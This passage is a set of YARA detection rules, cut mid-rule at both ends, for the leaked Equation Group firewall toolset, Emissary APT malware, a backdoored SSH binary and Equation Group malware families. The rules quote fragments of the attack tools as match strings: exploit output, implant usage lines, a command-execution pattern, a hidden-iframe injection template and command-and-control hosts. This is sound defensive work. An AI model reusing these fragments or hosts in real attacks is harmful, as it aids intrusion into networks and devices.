$x1 = "the --spoof option requires 3 or 4 fields as follows redir_ip" ascii $x2 = "[-] timeout waiting for response - target may have crashed" fullword ascii $x3 = "[-] no response from health check - target may have crashed" fullword ascii condition: 1 of them } rule EQGRP_uninstallPBD { meta: description = "EQGRP Toolset Firewall - file uninstallPBD.bat" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "692fdb449f10057a114cf2963000f52ce118d9a40682194838006c66af159bd0" strings: $s1 = "memset 00e9a05c 4 38845b88" fullword ascii $s2 = "_hidecmd" fullword ascii $s3 = "memset 013abd04 1 0d" fullword ascii condition: all of them } rule EQGRP_BICECREAM { meta: description = "EQGRP Toolset Firewall - file BICECREAM-2140" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "4842076af9ba49e6dfae21cf39847b4172c06a0bd3d2f1ca6f30622e14b77210" strings: $s1 = "Could not connect to target device: %s:%d. Please check IP address." fullword ascii $s2 = "command data size is invalid for an exec cmd" fullword ascii $s3 = "A script was specified but target is not a PPC405-based NetScreen (NS5XT, NS25, and NS50). Executing scripts is supported but ma" ascii $s4 = "Execute 0x%08x with args (%08x, %08x, %08x, %08x): [y/n]" fullword ascii $s5 = "Execute 0x%08x with args (%08x, %08x, %08x): [y/n]" fullword ascii $s6 = "[%d] Execute code." fullword ascii $s7 = "Execute 0x%08x with args (%08x): [y/n]" fullword ascii $s8 = "dump_value_LHASH_DOALL_ARG" fullword ascii $s9 = "Eggcode is complete. Pass execution to it? [y/n]" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 5000KB and 2 of them ) or ( 5 of them ) } rule EQGRP_create_http_injection { meta: description = "EQGRP Toolset Firewall - file create_http_injection.py" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "de52f5621b4f3896d4bd1fb93ee8be827e71a2b189a9f8552b68baed062a992d" strings: $x1 = "required by SECONDDATE" fullword ascii $s1 = "help='Output file name (optional). By default the resulting data is written to stdout.')" fullword ascii $s2 = "data = '<html><body onload=\"location.reload(true)\"><iframe src=\"%s\" height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"" ascii $s3 = "version='%prog 1.0'," fullword ascii $s4 = "usage='%prog [ ... options ... ] url'," fullword ascii condition: ( uint16(0) == 0x2123 and filesize < 3KB and ( $x1 or 2 of them ) ) or ( all of them ) } rule EQGRP_BFLEA_2201 { meta: description = "EQGRP Toolset Firewall - file BFLEA-2201.exe" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "15e8c743770e44314496c5f27b6297c5d7a4af09404c4aa507757e0cc8edc79e" strings: $s1 = ".got_loader" fullword ascii $s2 = "LOADED" fullword ascii $s3 = "readFlashHandler" fullword ascii $s4 = "KEEPGOING" fullword ascii $s5 = "flashRtnsPix6x.c" fullword ascii $s6 = "fix_ip_cksum_incr" fullword ascii $s7 = "writeFlashHandler" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 30KB and 5 of them ) or ( all of them ) } rule EQGRP_BpfCreator_RHEL4 { meta: description = "EQGRP Toolset Firewall - file BpfCreator-RHEL4" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "bd7303393409623cabf0fcf2127a0b81fae52fe40a0d2b8db0f9f092902bbd92" strings: $s1 = "usage %s \"<tcpdump pcap string>\" <outfile>" fullword ascii $s2 = "error reading dump file: %s" fullword ascii $s3 = "truncated dump file; tried to read %u captured bytes, only got %lu" fullword ascii $s4 = "%s: link-layer type %d isn't supported in savefiles" fullword ascii $s5 = "DLT %d is not one of the DLTs supported by this device" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 2000KB and all of them ) } rule EQGRP_StoreFc { meta: description = "EQGRP Toolset Firewall - file StoreFc.py" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "f155cce4eecff8598243a721389046ae2b6ca8ba6cb7b4ac00fd724601a56108" strings: $x1 = "Usage: StoreFc.py --configFile=<path to xml file> --implantFile=<path to BinStore implant> [--outputFile=<file to write the conf" ascii $x2 = "raise Exception, \"Must supply both a config file and implant file.\"" fullword ascii $x3 = "This is wrapper for Store.py that FELONYCROWBAR will use. This" fullword ascii condition: 1 of them } rule EQGRP_hexdump { meta: description = "EQGRP Toolset Firewall - file hexdump.py" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "95a9a6a8de60d3215c1c9f82d2d8b2640b42f5cabdc8b50bd1f4be2ea9d7575a" strings: $s1 = "def hexdump(x,lead=\"[+] \",out=sys.stdout):" fullword ascii $s2 = "print >>out, \"%s%04x \" % (lead,i)," fullword ascii $s3 = "print >>out, \"%02X\" % ord(x[i+j])," fullword ascii $s4 = "print >>out, sane(x[i:i+16])" fullword ascii condition: ( uint16(0) == 0x2123 and filesize < 1KB and 2 of ($s*) ) or ( all of them ) } rule EQGRP_BBALL { meta: description = "EQGRP Toolset Firewall - file BBALL_E28F6-2201.exe" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "498fc9f20b938b8111adfa3ca215325f265a08092eefd5300c4168876deb7bf6" strings: $s1 = "Components/Modules/BiosModule/Implant/E28F6/../e28f640j3_asm.S" fullword ascii $s2 = ".got_loader" fullword ascii $s3 = "handler_readBIOS" fullword ascii $s4 = "cmosReadByte" fullword ascii $s5 = "KEEPGOING" fullword ascii $s6 = "checksumAreaConfirmed.0" fullword ascii $s7 = "writeSpeedPlow.c" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 40KB and 4 of ($s*) ) or ( all of them ) } /* Super Rules ------------------------------------------------------------- */ rule EQGRP_BARPUNCH_BPICKER { meta: description = "EQGRP Toolset Firewall - from files BARPUNCH-3110, BPICKER-3100" author = "Florian Roth" reference = "Research" date = "2016-08-16" super_rule = 1 hash1 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc" hash2 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f" strings: $x1 = "--cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s --lptimeout %u" fullword ascii $x2 = "%s -c <cmdtype> -l <lp> -i <implant> -k <ikey> -s <port> -d <port> [operation] [options]" fullword ascii $x3 = "* [%lu] 0x%x is marked as stateless (the module will be persisted without its configuration)" fullword ascii $x4 = "%s version %s already has persistence installed. If you want to uninstall," fullword ascii $x5 = "The active module(s) on the target are not meant to be persisted" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 6000KB and 1 of them ) or ( 3 of them ) } rule EQGRP_Implants_Gen6 { meta: description = "EQGRP Toolset Firewall - from files BananaUsurper-2120, BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, BPICKER-3100, writeJetPlow-2130" author = "Florian Roth" reference = "Research" date = "2016-08-16" super_rule = 1 hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119" hash2 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4" hash3 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939" hash4 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2" hash5 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3" hash6 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f" hash7 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c" strings: $s1 = "LP.c:pixSecurity - Improper number of bytes read in Security/Interface Information" fullword ascii $s2 = "LP.c:pixSecurity - Not in Session" fullword ascii $s3 = "getModInterface__preloadedModules" fullword ascii $s4 = "showCommands" fullword ascii $s5 = "readModuleInterface" fullword ascii $s6 = "Wrapping_Not_Necessary_Or_Wrapping_Ok" fullword ascii $s7 = "Get_CMD_List" fullword ascii $s8 = "LP_Listen2" fullword ascii $s9 = "killCmdList" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 6000KB and all of them ) } rule EQGRP_Implants_Gen5 { meta: description = "EQGRP Toolset Firewall - from files BananaUsurper-2120, BARPUNCH-3110, BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, BPICKER-3100, writeJetPlow-2130" author = "Florian Roth" reference = "Research" date = "2016-08-16" super_rule = 1 hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119" hash2 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc" hash3 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4" hash4 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939" hash5 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2" hash6 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3" hash7 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f" hash8 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c" strings: $x1 = "Module and Implant versions do not match. This module is not compatible with the target implant" fullword ascii $s1 = "%s/BF_READ_%08x_%04d%02d%02d_%02d%02d%02d.log" fullword ascii $s2 = "%s/BF_%04d%02d%02d.log" fullword ascii $s3 = "%s/BF_READ_%08x_%04d%02d%02d_%02d%02d%02d.bin" fullword ascii condition: ( uint16(0) == 0x457f and 1 of ($x*) ) or ( all of them ) } rule EQGRP_pandarock { meta: description = "EQGRP Toolset Firewall - from files pandarock_v1.11.1.1.bin, pit" author = "Florian Roth" reference = "Research" date = "2016-08-16" super_rule = 1 hash1 = "1214e282ac7258e616ebd76f912d4b2455d1b415b7216823caa3fc0d09045a5f" hash2 = "c8a151df7605cb48feb8be2ab43ec965b561d2b6e2a837d645fdf6a6191ab5fe" strings: $x1 = "* Not attempting to execute \"%s\" command" fullword ascii $x2 = "TERMINATING SCRIPT (command error or \"quit\" encountered)" fullword ascii $x3 = "execute code in <file> passing <argX> (HEX)" fullword ascii $x4 = "* Use arrow keys to scroll through command history" fullword ascii $s1 = "pitCmd_processCmdLine" fullword ascii $s2 = "execute all commands in <file>" fullword ascii $s3 = "__processShellCmd" fullword ascii $s4 = "pitTarget_getDstPort" fullword ascii $s5 = "__processSetTargetIp" fullword ascii $o1 = "Logging commands and output - ON" fullword ascii $o2 = "This command is too dangerous. If you'd like to run it, contact the development team" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 3000KB and 1 of ($x*) ) or ( 4 of them ) or 1 of ($o*) } rule EQGRP_BananaUsurper_writeJetPlow { meta: description = "EQGRP Toolset Firewall - from files BananaUsurper-2120, writeJetPlow-2130" author = "Florian Roth" reference = "Research" date = "2016-08-16" super_rule = 1 hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119" hash2 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c" strings: $x1 = "Implant Version-Specific Values:" fullword ascii $x2 = "This function should not be used with a Netscreen, something has gone horribly wrong" fullword ascii $s1 = "createSendRecv: recv'd an error from the target." fullword ascii $s2 = "Error: WatchDogTimeout read returned %d instead of 4" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 2000KB and 1 of ($x*) ) or ( 3 of them ) } rule EQGRP_Implants_Gen4 { meta: description = "EQGRP Toolset Firewall - from files BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120" author = "Florian Roth" reference = "Research" date = "2016-08-16" super_rule = 1 hash1 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4" hash2 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939" hash3 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2" hash4 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3" strings: $s1 = "Command has not yet been coded" fullword ascii $s2 = "Beacon Domain : www.%s.com" fullword ascii $s3 = "This command can only be run on a PIX/ASA" fullword ascii $s4 = "Warning! Bad or missing Flash values (in section 2 of .dat file)" fullword ascii $s5 = "Printing the interface info and security levels. PIX ONLY." fullword ascii condition: ( uint16(0) == 0x457f and filesize < 3000KB and 3 of them ) or ( all of them ) } rule EQGRP_Implants_Gen3 { meta: description = "EQGRP Toolset Firewall - from files BARPUNCH-3110, BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, BPICKER-3100" author = "Florian Roth" reference = "Research" date = "2016-08-16" super_rule = 1 hash1 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc" hash2 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4" hash3 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939" hash4 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2" hash5 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3" hash6 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f" strings: $x1 = "incomplete and must be removed manually.)" fullword ascii $s1 = "%s: recv'd an error from the target." fullword ascii $s2 = "Unable to fetch the address to the get_uptime_secs function for this OS version" fullword ascii $s3 = "upload/activate/de-activate/remove/cmd function failed" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 6000KB and 2 of them ) or ( all of them ) } rule EQGRP_BLIAR_BLIQUER { meta: description = "EQGRP Toolset Firewall - from files BLIAR-2110, BLIQUER-2230" author = "Florian Roth" reference = "Research" date = "2016-08-16" super_rule = 1 hash1 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4" hash2 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939" strings: $x1 = "Do you wish to activate the implant that is already on the firewall? (y/n): " fullword ascii $x2 = "There is no implant present on the firewall." fullword ascii $x3 = "Implant Version :%lx%lx%lx" fullword ascii $x4 = "You may now connect to the implant using the pbd idkey" fullword ascii $x5 = "No reply from persistant back door." fullword ascii $x6 = "rm -rf pbd.wc; wc -c %s > pbd.wc" fullword ascii $p1 = "PBD_GetVersion" fullword ascii $p2 = "pbd/pbdEncrypt.bin" fullword ascii $p3 = "pbd/pbdGetVersion.pkt" fullword ascii $p4 = "pbd/pbdStartWrite.bin" fullword ascii $p5 = "pbd/pbd_setNewHookPt.pkt" fullword ascii $p6 = "pbd/pbd_Upload_SinglePkt.pkt" fullword ascii $s1 = "Unable to fetch hook and jmp addresses for this OS version" fullword ascii $s2 = "Could not get hook and jump addresses" fullword ascii $s3 = "Enter the name of a clean implant binary (NOT an image):" fullword ascii $s4 = "Unable to read dat file for OS version 0x%08lx" fullword ascii $s5 = "Invalid implant file" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 3000KB and ( 1 of ($x*) or 1 of ($p*) ) ) or ( 3 of them ) } rule EQGRP_sploit { meta: description = "EQGRP Toolset Firewall - from files sploit.py, sploit.py" author = "Florian Roth" reference = "Research" date = "2016-08-16" super_rule = 1 hash1 = "0316d70a5bbf068a7fc791e08e816015d04ec98f088a7ff42af8b9e769b8d1f6" hash2 = "0316d70a5bbf068a7fc791e08e816015d04ec98f088a7ff42af8b9e769b8d1f6" strings: $s1 = "print \"[+] Connecting to %s:%s\" % (self.params.dst['ip'], self.params.dst['port'])" fullword ascii $s2 = "@overridable(\"Must be overriden if the target will be touched. Base implementation should not be called.\")" fullword ascii $s3 = "@overridable(\"Must be overriden. Base implementation should not be called.\")" fullword ascii $s4 = "exp.load_vinfo()" fullword ascii $s5 = "if not okay and self.terminateFlingOnException:" fullword ascii $s6 = "print \"[-] keyboard interrupt before response received\"" fullword ascii $s7 = "if self.terminateFlingOnException:" fullword ascii $s8 = "print 'Debug info ','='*40" fullword ascii condition: ( uint16(0) == 0x2123 and filesize < 90KB and 1 of ($s*) ) or ( 4 of them ) } rule EQGRP_Implants_Gen2 { meta: description = "EQGRP Toolset Firewall - from files BananaUsurper-2120, BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, writeJetPlow-2130" author = "Florian Roth" reference = "Research" date = "2016-08-16" super_rule = 1 hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119" hash2 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4" hash3 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939" hash4 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2" hash5 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3" hash6 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c" strings: $x1 = "Modules persistence file written successfully" fullword ascii $x2 = "Modules persistence data successfully removed" fullword ascii $x3 = "No Modules are active on the firewall, nothing to persist" fullword ascii $s1 = "--cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s " fullword ascii $s2 = "Error while attemping to persist modules:" fullword ascii $s3 = "Error while reading interface info from PIX" fullword ascii $s4 = "LP.c:pixFree - Failed to get response" fullword ascii $s5 = "WARNING: LP Timeout specified (%lu seconds) less than default (%u seconds). Setting default" fullword ascii $s6 = "Unable to fetch config address for this OS version" fullword ascii $s7 = "LP.c: interface information not available for this session" fullword ascii $s8 = "[%s:%s:%d] ERROR: " fullword ascii $s9 = "extract_fgbg" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 3000KB and 1 of ($x*) ) or ( 5 of them ) } rule EQGRP_Implants_Gen1 { meta: description = "EQGRP Toolset Firewall - from files BananaUsurper-2120, BARPUNCH-3110, BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, BPICKER-3100, lpexe, writeJetPlow-2130" author = "Florian Roth" reference = "Research" date = "2016-08-16" super_rule = 1 hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119" hash2 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc" hash3 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4" hash4 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939" hash5 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2" hash6 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3" hash7 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f" hash8 = "ee3e3487a9582181892e27b4078c5a3cb47bb31fc607634468cc67753f7e61d7" hash9 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c" strings: $s1 = "WARNING: Session may not have been closed!" fullword ascii $s2 = "EXEC Packet Processed" fullword ascii $s3 = "Failed to insert the command into command list." fullword ascii $s4 = "Send_Packet: Trying to send too much data." fullword ascii $s5 = "payloadLength >= MAX_ALLOW_SIZE." fullword ascii $s6 = "Wrong Payload Size" fullword ascii $s7 = "Unknown packet received......" fullword ascii $s8 = "Returned eax = %08x" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 6000KB and ( 2 of ($s*) ) ) or ( 5 of them ) } rule EQGRP_eligiblebombshell_generic { meta: description = "EQGRP Toolset Firewall - from files eligiblebombshell_1.2.0.1.py, eligiblebombshell_1.2.0.1.py" author = "Florian Roth" reference = "Research" date = "2016-08-16" super_rule = 1 hash1 = "dd0e3ae6e1039a755bf6cb28bf726b4d6ab4a1da2392ba66d114a43a55491eb1" hash2 = "dd0e3ae6e1039a755bf6cb28bf726b4d6ab4a1da2392ba66d114a43a55491eb1" strings: $s1 = "logging.error(\" Perhaps you should run with --scan?\")" fullword ascii $s2 = "logging.error(\"ERROR: No entry for ETag [%s] in %s.\" %" fullword ascii $s3 = "\"be supplied\")" fullword ascii condition: ( filesize < 70KB and 2 of ($s*) ) or ( all of them ) } rule EQGRP_ssh_telnet_29 { meta: description = "EQGRP Toolset Firewall - from files ssh.py, telnet.py" author = "Florian Roth" reference = "Research" date = "2016-08-16" super_rule = 1 hash1 = "630d464b1d08c4dfd0bd50552bee2d6a591fb0b5597ecebaa556a3c3d4e0aa4e" hash2 = "07f4c60505f4d5fb5c4a76a8c899d9b63291444a3980d94c06e1d5889ae85482" strings: $s1 = "received prompt, we're in" fullword ascii $s2 = "failed to login, bad creds, abort" fullword ascii $s3 = "sending command \" + str(n) + \"/\" + str(tot) + \", len \" + str(len(chunk) + " fullword ascii $s4 = "received nat - EPBA: ok, payload: mangled, did not run" fullword ascii $s5 = "no status returned from target, could be an exploit failure, or this is a version where we don't expect a stus return" ascii $s6 = "received arp - EPBA: ok, payload: fail" fullword ascii $s7 = "chopped = string.rstrip(payload, \"\\x0a\")" fullword ascii condition: ( filesize < 10KB and 2 of them ) or ( 3 of them ) } /* Extras */ rule EQGRP_tinyexec { meta: description = "EQGRP Toolset Firewall - from files tinyexec" author = "Florian Roth" reference = "Research" date = "2016-08-16" strings: $s1 = { 73 68 73 74 72 74 61 62 00 2E 74 65 78 74 } $s2 = { 5A 58 55 52 89 E2 55 50 89 E1 } condition: uint32(0) == 0x464c457f and filesize < 270 and all of them } rule EQGRP_callbacks { meta: description = "EQGRP Toolset Firewall - Callback addresses" author = "Florian Roth" reference = "Research" date = "2016-08-16" strings: $s1 = "30.40.50.60:9342" fullword ascii wide /* DoD */ condition: 1 of them } rule EQGRP_Extrabacon_Output { meta: description = "EQGRP Toolset Firewall - Extrabacon exploit output" author = "Florian Roth" reference = "Research" date = "2016-08-16" strings: $s1 = "|###[ SNMPresponse ]###" fullword ascii $s2 = "[+] generating exploit for exec mode pass-disable" fullword ascii $s3 = "[+] building payload for mode pass-disable" fullword ascii $s4 = "[+] Executing: extrabacon" fullword ascii $s5 = "appended AAAADMINAUTH_ENABLE payload" fullword ascii condition: 2 of them } rule EQGRP_Unique_Strings { meta: description = "EQGRP Toolset Firewall - Unique strings" author = "Florian Roth" reference = "Research" date = "2016-08-16" strings: $s1 = "/BananaGlee/ELIGIBLEBOMB" ascii $s2 = "Protocol must be either http or https (Ex: https://1.2.3.4:1234)" condition: 1 of them } rule EQGRP_RC5_RC6_Opcode { meta: description = "EQGRP Toolset Firewall - RC5 / RC6 opcode" author = "Florian Roth" reference = "https://securelist.com/blog/incidents/75812/the-equation-giveaway/" date = "2016-08-17" strings: /* mov esi, [ecx+edx*4-4] sub esi, 61C88647h mov [ecx+edx*4], esi inc edx cmp edx, 2Bh */ $s1 = { 8B 74 91 FC 81 EE 47 86 C8 61 89 34 91 42 83 FA 2B } condition: 1 of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Yara Rule Set Author: Florian Roth Date: 2016-01-02 Identifier: Emissary Malware */ rule Emissary_APT_Malware_1 { meta: description = "Detect Emissary Malware - from samples A08E81B411.DAT, ishelp.dll" author = "Florian Roth" reference = "http://goo.gl/V0epcf" date = "2016-01-02" score = 75 hash1 = "9420017390c598ee535c24f7bcbd39f40eca699d6c94dc35bcf59ddf918c59ab" hash2 = "70561f58c9e5868f44169854bcc906001947d98d15e9b4d2fbabd1262d938629" hash3 = "0e64e68f6f88b25530699a1cd12f6f2790ea98e6e8fa3b4bc279f8e5c09d7290" hash4 = "69caa2a4070559d4cafdf79020c4356c721088eb22398a8740dea8d21ae6e664" hash5 = "675869fac21a94c8f470765bc6dd15b17cc4492dd639b878f241a45b2c3890fc" hash6 = "e817610b62ccd00bdfc9129f947ac7d078d97525e9628a3aa61027396dba419b" hash7 = "a8b0d084949c4f289beb4950f801bf99588d1b05f68587b245a31e8e82f7a1b8" hash8 = "acf7dc5a10b00f0aac102ecd9d87cd94f08a37b2726cb1e16948875751d04cc9" hash9 = "e21b47dfa9e250f49a3ab327b7444902e545bed3c4dcfa5e2e990af20593af6d" hash10 = "e369417a7623d73346f6dff729e68f7e057f7f6dae7bb03d56a7510cb3bfe538" hash11 = "29d8dc863427c8e37b75eb738069c2172e79607acc7b65de6f8086ba36abf051" hash12 = "98fb1d2975babc18624e3922406545458642e01360746870deee397df93f50e0" hash13 = "fbcb401cf06326ab4bb53fb9f01f1ca647f16f926811ea66984f1a1b8cf2f7bb" strings: $s1 = "cmd.exe /c %s > %s" fullword ascii $s2 = "execute cmd timeout." fullword ascii $s3 = "rundll32.exe \"%s\",Setting" fullword ascii $s4 = "DownloadFile - exception:%s." fullword ascii $s5 = "CDllApp::InitInstance() - Evnet create successful." fullword ascii $s6 = "UploadFile - EncryptBuffer Error" fullword ascii $s7 = "WinDLL.dll" fullword wide $s8 = "DownloadFile - exception:%s,code:0x%08x." fullword ascii $s9 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" fullword ascii $s10 = "CDllApp::InitInstance() - Evnet already exists." fullword ascii condition: uint16(0) == 0x5a4d and filesize < 250KB and 3 of them } rule Backdoored_ssh { meta: author = "Kaspersky" reference = "https://securelist.com/energetic-bear-crouching-yeti/85345/" actor = "Energetic Bear/Crouching Yeti" strings: $a1 = "OpenSSH" $a2 = "usage: ssh" $a3 = "HISTFILE" condition: uint32(0) == 0x464c457f and filesize<1000000 and all of ($a*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" /* Equation APT ------------------------------------------------------------ */ rule apt_equation_exploitlib_mutexes { meta: copyright = "Kaspersky Lab" description = "Rule to detect Equation group's Exploitation library http://goo.gl/ivt8EW" version = "1.0" last_modified = "2015-02-16" reference = "http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/" strings: $mz="MZ" $a1="prkMtx" wide $a2="cnFormSyncExFBC" wide $a3="cnFormVoidFBC" wide $a4="cnFormSyncExFBC" $a5="cnFormVoidFBC" condition: (($mz at 0) and any of ($a*)) } rule apt_equation_doublefantasy_genericresource { meta: copyright = "Kaspersky Lab" description = "Rule to detect DoubleFantasy encoded config http://goo.gl/ivt8EW" version = "1.0" last_modified = "2015-02-16" reference = "http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/" strings: $mz="MZ" $a1={06 00 42 00 49 00 4E 00 52 00 45 00 53 00} $a2="yyyyyyyyyyyyyyyy" $a3="002" condition: (($mz at 0) and all of ($a*)) and filesize < 500000 } rule apt_equation_equationlaser_runtimeclasses { meta: copyright = "Kaspersky Lab" description = "Rule to detect the EquationLaser malware" version = "1.0" last_modified = "2015-02-16" reference = "https://securelist.com/blog/" strings: $a1="?a73957838_2@@YAXXZ" $a2="?a84884@@YAXXZ" $a3="?b823838_9839@@YAXXZ" $a4="?e747383_94@@YAXXZ" $a5="?e83834@@YAXXZ" $a6="?e929348_827@@YAXXZ" condition: any of them } rule apt_equation_cryptotable { meta: copyright = "Kaspersky Lab" description = "Rule to detect the crypto library used in Equation group malware" version = "1.0" last_modified = "2015-02-16" reference = "https://securelist.com/blog/" strings: $a={37 DF E8 B6 C7 9C 0B AE 91 EF F0 3B 90 C6 80 85 5D 19 4B 45 44 12 3C E2 0D 5C 1C 7B C4 FF D6 05 17 14 4F 03 74 1E 41 DA 8F 7D DE 7E 99 F1 35 AC B8 46 93 CE 23 82 07 EB 2B D4 72 71 40 F3 B0 F7 78 D7 4C D1 55 1A 39 83 18 FA E1 9A 56 B1 96 AB A6 30 C5 5F BE 0C 50 C1} condition: $a } /* Equation Group - Kaspersky ---------------------------------------------- */ rule Equation_Kaspersky_TripleFantasy_1 { meta: description = "Equation Group Malware - TripleFantasy http://goo.gl/ivt8EW" author = "Florian Roth" reference = "http://goo.gl/ivt8EW" date = "2015/02/16" hash = "b2b2cd9ca6f5864ef2ac6382b7b6374a9fb2cbe9" strings: $mz = { 4d 5a } $s0 = "%SystemRoot%\\system32\\hnetcfg.dll" fullword wide $s1 = "%WINDIR%\\System32\\ahlhcib.dll" fullword wide $s2 = "%WINDIR%\\sjyntmv.dat" fullword wide $s3 = "Global\\{8c38e4f3-591f-91cf-06a6-67b84d8a0102}" fullword wide $s4 = "%WINDIR%\\System32\\owrwbsdi" fullword wide $s5 = "Chrome" fullword wide $s6 = "StringIndex" fullword ascii $x1 = "itemagic.net@443" fullword wide $x2 = "team4heat.net@443" fullword wide $x5 = "62.216.152.69@443" fullword wide $x6 = "84.233.205.37@443" fullword wide $z1 = "www.microsoft.com@80" fullword wide $z2 = "www.google.com@80" fullword wide $z3 = "127.0.0.1:3128" fullword wide condition: ( $mz at 0 ) and filesize < 300000 and (( all of ($s*) and all of ($z*) ) or ( all of ($s*) and 1 of ($x*) )) } rule Equation_Kaspersky_DoubleFantasy_1 { meta: description = "Equation Group Malware - DoubleFantasy" author = "Florian Roth" reference = "http://goo.gl/ivt8EW" date = "2015/02/16" hash = "d09b4b6d3244ac382049736ca98d7de0c6787fa2" strings: $mz = { 4d 5a } $z1 = "msvcp5%d.dll" fullword ascii $s0 = "actxprxy.GetProxyDllInfo" fullword ascii $s3 = "actxprxy.DllGetClassObject" fullword ascii $s5 = "actxprxy.DllRegisterServer" fullword ascii $s6 = "actxprxy.DllUnregisterServer" fullword ascii $x1 = "yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy" ascii $x2 = "191H1a1" fullword ascii $x3 = "November " fullword ascii $x4 = "abababababab" fullword ascii $x5 = "January " fullword ascii $x6 = "October " fullword ascii $x7 = "September " fullword ascii condition: ( $mz at 0 ) and filesize < 350000 and (( $z1 ) or ( all of ($s*) and 6 of ($x*) )) } rule Equation_Kaspersky_GROK_Keylogger { meta: description = "Equation Group Malware - GROK keylogger" author = 